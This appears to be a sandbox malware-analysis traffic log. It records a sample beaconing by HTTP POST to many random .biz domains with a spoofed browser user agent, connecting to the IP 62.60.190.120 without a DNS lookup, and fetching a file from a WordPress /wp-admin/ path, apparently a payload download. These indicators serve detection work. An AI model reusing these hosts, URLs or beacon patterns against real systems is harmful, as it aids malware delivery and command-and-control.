                Source: global trafficHTTP traffic detected: POST /twuuqp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yhqqc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /cjvae HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gnqgo.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /jshlt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: mnjmhp.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /eccfsowypckinddi HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gnqgo.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /gm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jhvzpcfg.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /qpmofftfdba HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: opowhhece.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /hclqv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: acwjcqqv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /qpbiwob HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jdhhbs.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /hhfkorwt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vyome.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /uack HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: mgmsclkyu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /rbv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yauexmxk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /epwoomrcoonof HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yauexmxk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /btmiljbhjx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: warkcdu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /kwpvpynqhxqs HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: iuzpxe.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /ectmddoihjyrxjp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gcedd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /jdoddcjkmiicjrmw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: sxmiywsfv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: global trafficHTTP traffic detected: POST /nv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jwkoeoqns.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: POST /bdvsq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vrrazpdh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                Source: unknownTCP traffic detected without corresponding DNS query: 62.60.190.120
                Source: unknownTCP traffic detected without corresponding DNS query: 62.60.190.120
                Source: unknownTCP traffic detected without corresponding DNS query: 62.60.190.120
                Source: unknownTCP traffic detected without corresponding DNS query: 62.60.190.120
                Source: unknownTCP traffic detected without corresponding DNS query: 62.60.190.120
                Source: unknownTCP traffic detected without corresponding DNS query: 62.60.190.120
                Source: unknownTCP traffic detected without corresponding DNS query: 62.60.190.120
                Source: unknownTCP traffic detected without corresponding DNS query: 62.60.190.120
                Source: unknownTCP traffic detected without corresponding DNS query: 62.60.190.120
                Source: unknownTCP traffic detected without corresponding DNS query: 62.60.190.120
                Source: unknownTCP traffic detected without corresponding DNS query: 62.60.190.120
                Source: unknownTCP traffic detected without corresponding DNS query: 62.60.190.120
                Source: unknownTCP traffic detected without corresponding DNS query: 62.60.190.120
                Source: unknownTCP traffic detected without corresponding DNS query: 62.60.190.120
                Source: unknownTCP traffic detected without corresponding DNS query: 62.60.190.120
                Source: unknownTCP traffic detected without corresponding DNS query: 62.60.190.120
                Source: unknownTCP traffic detected without corresponding DNS query: 62.60.190.120
                Source: unknownTCP traffic detected without corresponding DNS query: 62.60.190.120
                Source: unknownTCP traffic detected without corresponding DNS query: 62.60.190.120
                Source: unknownTCP traffic detected without corresponding DNS query: 62.60.190.120
                Source: unknownTCP traffic detected without corresponding DNS query: 62.60.190.120
                Source: unknownTCP traffic detected without corresponding DNS query: 62.60.190.120
                Source: unknownTCP traffic detected without corresponding DNS query: 62.60.190.120
                Source: unknownTCP traffic detected without corresponding DNS query: 62.60.190.120
                Source: unknownTCP traffic detected without corresponding DNS query: 62.60.190.120
                Source: unknownTCP traffic detected without corresponding DNS query: 62.60.190.120
                Source: unknownTCP traffic detected without corresponding DNS query: 62.60.190.120
                Source: unknownTCP traffic detected without corresponding DNS query: 62.60.190.120
                Source: unknownTCP traffic detected without corresponding DNS query: 62.60.190.120
                Source: unknownTCP traffic detected without corresponding DNS query: 62.60.190.120
                Source: unknownTCP traffic detected without corresponding DNS query: 62.60.190.120
                Source: unknownTCP traffic detected without corresponding DNS query: 62.60.190.120
                Source: unknownTCP traffic detected without corresponding DNS query: 62.60.190.120
                Source: unknownTCP traffic detected without corresponding DNS query: 62.60.190.120
                Source: unknownTCP traffic detected without corresponding DNS query: 62.60.190.120
                Source: unknownTCP traffic detected without corresponding DNS query: 62.60.190.120
                Source: unknownTCP traffic detected without corresponding DNS query: 62.60.190.120
                Source: unknownTCP traffic detected without corresponding DNS query: 62.60.190.120
                Source: unknownTCP traffic detected without corresponding DNS query: 62.60.190.120
                Source: unknownTCP traffic detected without corresponding DNS query: 62.60.190.120
                Source: unknownTCP traffic detected without corresponding DNS query: 62.60.190.120
                Source: unknownTCP traffic detected without corresponding DNS query: 62.60.190.120
                Source: unknownTCP traffic detected without corresponding DNS query: 62.60.190.120
                Source: unknownTCP traffic detected without corresponding DNS query: 62.60.190.120
                Source: unknownTCP traffic detected without corresponding DNS query: 62.60.190.120
                Source: unknownTCP traffic detected without corresponding DNS query: 62.60.190.120
                Source: unknownTCP traffic detected without corresponding DNS query: 62.60.190.120
                Source: unknownTCP traffic detected without corresponding DNS query: 62.60.190.120
                Source: unknownTCP traffic detected without corresponding DNS query: 62.60.190.120
                Source: unknownTCP traffic detected without corresponding DNS query: 62.60.190.120
                Source: global trafficHTTP traffic detected: GET /wp-admin/233_Jwsmvmdweya HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: chichometextiles.com
                Source: global trafficDNS traffic detected: DNS query: chichometextiles.com
                Source: global trafficDNS traffic detected: DNS query: pywolwnvd.biz
                Source: global trafficDNS traffic detected: DNS query: ssbzmoy.biz
                Source: global trafficDNS traffic detected: DNS query: cvgrf.biz
                Source: global trafficDNS traffic detected: DNS query: npukfztj.biz
                Source: global trafficDNS traffic detected: DNS query: przvgke.biz
                Source: global trafficDNS traffic detected: DNS query: zlenh.biz
                Source: global trafficDNS traffic detected: DNS query: knjghuig.biz
                Source: global trafficDNS traffic detected: DNS query: uhxqin.biz
                Source: global trafficDNS traffic detected: DNS query: anpmnmxo.biz
                Source: global trafficDNS traffic detected: DNS query: lpuegx.biz
                Source: global trafficDNS traffic detected: DNS query: vjaxhpbji.biz
                Source: global trafficDNS traffic detected: DNS query: xlfhhhm.biz
                Source: global trafficDNS traffic detected: DNS query: ifsaia.biz
                Source: global trafficDNS traffic detected: DNS query: saytjshyf.biz
                Source: global trafficDNS traffic detected: DNS query: vcddkls.biz
                Source: global trafficDNS traffic detected: DNS query: fwiwk.biz
                Source: global trafficDNS traffic detected: DNS query: tbjrpv.biz
                Source: global trafficDNS traffic detected: DNS query: deoci.biz
                Source: global trafficDNS traffic detected: DNS query: gytujflc.biz
                Source: global trafficDNS traffic detected: DNS query: qaynky.biz
                Source: global trafficDNS traffic detected: DNS query: bumxkqgxu.biz
                Source: global trafficDNS traffic detected: DNS query: dwrqljrr.biz
                Source: global trafficDNS traffic detected: DNS query: nqwjmb.biz
                Source: global trafficDNS traffic detected: DNS query: ytctnunms.biz
                Source: global trafficDNS traffic detected: DNS query: myups.biz
                Source: global trafficDNS traffic detected: DNS query: oshhkdluh.biz
                Source: global trafficDNS traffic detected: DNS query: yunalwv.biz
                Source: global trafficDNS traffic detected: DNS query: jpskm.biz
                Source: global trafficDNS traffic detected: DNS query: lrxdmhrr.biz
                Source: global trafficDNS traffic detected: DNS query: wllvnzb.biz
                Source: global trafficDNS traffic detected: DNS query: gnqgo.biz
                Source: global trafficDNS traffic detected: DNS query: jhvzpcfg.biz
                Source: global trafficDNS traffic detected: DNS query: acwjcqqv.biz
                Source: global trafficDNS traffic detected: DNS query: lejtdj.biz
                Source: global trafficDNS traffic detected: DNS query: vyome.biz
                Source: global trafficDNS traffic detected: DNS query: yauexmxk.biz
                Source: global trafficDNS traffic detected: DNS query: iuzpxe.biz
                Source: global trafficDNS traffic detected: DNS query: sxmiywsfv.biz
                Source: global trafficDNS traffic detected: DNS query: vrrazpdh.biz
                Source: global trafficDNS traffic detected: DNS query: ftxlah.biz
                Source: global trafficDNS traffic detected: DNS query: typgfhb.biz
                Source: global trafficDNS traffic detected: DNS query: esuzf.biz
                Source: global trafficDNS traffic detected: DNS query: gvijgjwkh.biz
                Source: global trafficDNS traffic detected: DNS query: qpnczch.biz
                Source: global trafficDNS traffic detected: DNS query: brsua.biz
                Source: global trafficDNS traffic detected: DNS query: dlynankz.biz
                Source: global trafficDNS traffic detected: DNS query: oflybfv.biz
                Source: global trafficDNS traffic detected: DNS query: yhqqc.biz
                Source: global trafficDNS traffic detected: DNS query: mnjmhp.biz
                Source: global trafficDNS traffic detected: DNS query: opowhhece.biz
                Source: global trafficDNS traffic detected: DNS query: zjbpaao.biz
                Source: global trafficDNS traffic detected: DNS query: jdhhbs.biz
                Source: global trafficDNS traffic detected: DNS query: mgmsclkyu.biz
                Source: global trafficDNS traffic detected: DNS query: warkcdu.biz
                Source: global trafficDNS traffic detected: DNS query: gcedd.biz
                Source: global trafficDNS traffic detected: DNS query: jwkoeoqns.biz
                Source: global trafficDNS traffic detected: DNS query: xccjj.biz
                Source: global trafficDNS traffic detected: DNS query: hehckyov.biz
                Source: global trafficDNS traffic detected: DNS query: rynmcq.biz
                Source: global trafficDNS traffic detected: DNS query: uaafd.biz
                Source: global trafficDNS traffic detected: DNS query: eufxebus.biz
                Source: global trafficDNS traffic detected: DNS query: pwlqfu.biz
                Source: global trafficDNS traffic detected: DNS query: rrqafepng.biz
                Source: global trafficDNS traffic detected: DNS query: ctdtgwag.biz
                Source: global trafficDNS traffic detected: DNS query: tnevuluw.biz
                Source: global trafficDNS traffic detected: DNS query: whjovd.biz
                Source: global trafficDNS traffic detected: DNS query: gjogvvpsf.biz
                Source: global trafficDNS traffic detected: DNS query: reczwga.biz
                Source: global trafficDNS traffic detected: DNS query: bghjpy.biz
                Source: global trafficDNS traffic detected: DNS query: damcprvgv.biz
                Source: global trafficDNS traffic detected: DNS query: ocsvqjg.biz
                Source: global trafficDNS traffic detected: DNS query: ywffr.biz
                Source: global trafficDNS traffic detected: DNS query: ecxbwt.biz
                Source: global trafficDNS traffic detected: DNS query: pectx.biz
                Source: global trafficDNS traffic detected: DNS query: zyiexezl.biz
                Source: global trafficDNS traffic detected: DNS query: banwyw.biz
                Source: global trafficDNS traffic detected: DNS query: muapr.biz
                Source: global trafficDNS traffic detected: DNS query: wxgzshna.biz
                Source: global trafficDNS traffic detected: DNS query: zrlssa.biz
                Source: global trafficDNS traffic detected: DNS query: jlqltsjvh.biz
                Source: global trafficDNS traffic detected: DNS query: xyrgy.biz
                Source: global trafficDNS traffic detected: DNS query: htwqzczce.biz
                Source: global trafficDNS traffic detected: DNS query: kvbjaur.biz
                Source: global trafficDNS traffic detected: DNS query: uphca.biz
                Source: global trafficDNS traffic detected: DNS query: fjumtfnz.biz
                Source: global trafficDNS traffic detected: DNS query: hlzfuyy.biz
                Source: global trafficDNS traffic detected: DNS query: rffxu.biz
                Source: global trafficDNS traffic detected: DNS query: cikivjto.biz
                Source: global trafficDNS traffic detected: DNS query: qncdaagct.biz
                Source: global trafficDNS traffic detected: DNS query: shpwbsrw.biz
                Source: global trafficDNS traffic detected: DNS query: cjvgcl.biz
                Source: global trafficDNS traffic detected: DNS query: neazudmrq.biz
                Source: global trafficDNS traffic detected: DNS query: pgfsvwx.biz
                Source: global trafficDNS traffic detected: DNS query: aatcwo.biz
                Source: global trafficDNS traffic detected: DNS query: kcyvxytog.biz
                Source: global trafficDNS traffic detected: DNS query: nwdnxrd.biz
                Source: global trafficDNS traffic detected: DNS query: ereplfx.biz
                Source: global trafficDNS traffic detected: DNS query: ptrim.biz
                Source: global trafficDNS traffic detected: DNS query: znwbniskf.biz
                Source: unknownHTTP traffic detected: POST /xvpanbchxym HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 01 Nov 2024 07:23:56 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 01 Nov 2024 07:23:56 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 01 Nov 2024 07:24:04 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
